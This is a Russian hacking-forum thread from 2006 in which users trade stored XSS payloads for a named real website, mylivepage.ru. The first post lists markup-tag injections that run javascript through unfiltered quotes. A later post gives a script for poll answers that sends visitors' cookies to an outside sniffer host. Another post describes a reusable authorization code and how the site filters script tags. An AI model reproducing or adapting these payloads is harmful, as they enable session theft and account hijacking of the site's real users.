ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу mylivepage.ru активные XSS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

mylivepage.ru активные XSS
  #1  
Старый 19.11.2006, 22:08
Аватар для __XT__
__XT__
Познающий
Регистрация: 07.11.2006
Сообщений: 30
Провел на форуме:
128714

Репутация: 40
По умолчанию mylivepage.ru активные XSS
mylivepage.ru/
активные XSS в форуме, комментариях, личных сообщениях и везде где можно
оставить своё сообщение.

Нет фильтрации `"` применив дополнительные динамические
параметры тэга img експлуатируем XSS:
[[Smile:"dynsrc="javascript:alert()]]
[[Smile:"lowsrc="javascript:alert()]]
[[Smile:"style="javascript:alert()]]
[[Image:"lowsrc="javascript:alert()]]
[[Image:"style="javascript:alert()]]
[[Image:"dynsrc="javascript:alert()]]
[[http://qwe.ru"style="background:url(javascript:alert())]]
 
Ответить с цитированием

  #2  
Старый 19.11.2006, 22:11
Аватар для __XT__
__XT__
Познающий
Регистрация: 07.11.2006
Сообщений: 30
Провел на форуме:
128714

Репутация: 40
По умолчанию
ггг совсем забыл про ещё один параметр onerror=
помойму=)))
короче пипец=
мне кажеться хсс самое малое чт отам есть....наверняка там пхп инъекций куча!
и скуль тоже.
 
Ответить с цитированием

  #3  
Старый 13.12.2006, 16:52
Аватар для DimOnOID
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию
там ещё в Опросе есть ....

в вариантах ответа пишем..

Код:
<script>img = new Image(); img.src = "http://site.ru/ваш СниФ.jpg?"+document.cookie;</script>
и куки у нас....
 
Ответить с цитированием

  #4  
Старый 23.12.2006, 14:31
Аватар для Retscan
Retscan
Познающий
Регистрация: 17.12.2006
Сообщений: 32
Провел на форуме:
172639

Репутация: 31
По умолчанию
Да этот mylivepage.ru даже id сессии не сохраняет и код авторизации всегда один и тот же можно использовать - можно зафлудить по самое не могу.

Правда, слово "<script>" фильтруется полным удалием. Даже <scr<script>ipt> не помогает. Так что че-то затруднился с угоном печенья
Последний раз редактировалось Retscan; 23.12.2006 в 14:52..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Энциклопедия уязвимых скриптов DIAgen Сценарии/CMF/СMS 401 17.06.2010 17:39
IE XSS Kit .Slip Чаты 22 23.10.2006 06:45
XSS worms Xex Статьи 0 02.10.2006 01:49
Активные XSS на www.vip.mp3spy.ru _kREveDKo_ Уязвимости 0 16.06.2006 22:31
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ